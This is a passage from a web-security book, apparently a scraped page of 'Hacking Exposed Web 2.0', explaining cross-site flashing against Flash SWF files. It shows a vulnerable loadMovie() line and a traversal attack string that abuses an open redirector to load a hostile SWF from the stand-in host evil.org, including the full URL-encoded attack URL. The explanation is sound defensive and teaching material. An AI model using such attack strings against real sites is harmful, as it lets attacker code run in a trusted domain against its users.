baseUrl + "/movie.swf");
an attacker would push the concatenated text ???/movie.swf??? into a URL parameter, thus
essentially commenting out the concatenated text.
Leveraging URL Redirectors for XSF Attacks
Popularity: 1
Simplicity: 5
Impact: 8
Risk Rating: 8
Suppose example.com hosted an SWF with the following code:
loadMovie("http://example.com/movies/" + _root.movieId + ".swf?other=info");
And suppose example.com had an open redirector at http://example.com/redirect that
would redirect to any domain. An attacker could use example.com??™s redirector to mount
an attack using the following attack string for movieId:
../redirect=http://evil.org/HackWorld.swf%3F
loadMovie() would then load this,
http://example.com/movies/../redirect=http://evil.org/HackWorld.swf%3F
.swf?other=info
which is the same as this,
http://example.com/redirect=http://evil.org/HackWorld.swf%3F.swf?other=info
which redirects to this:
http://evil.org/HackWorld.swf
Thus, the vulnerable SWF still loads HackWorld in the example.com domain! With URL
encoding, the attack URL would look like this:
http://example.com/vulnerable.swf?movieId=../redirect%3D
http%3A//evil.org/HackWorld.swf%253F
236 Hacking Exposed Web 2.
Pages:
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410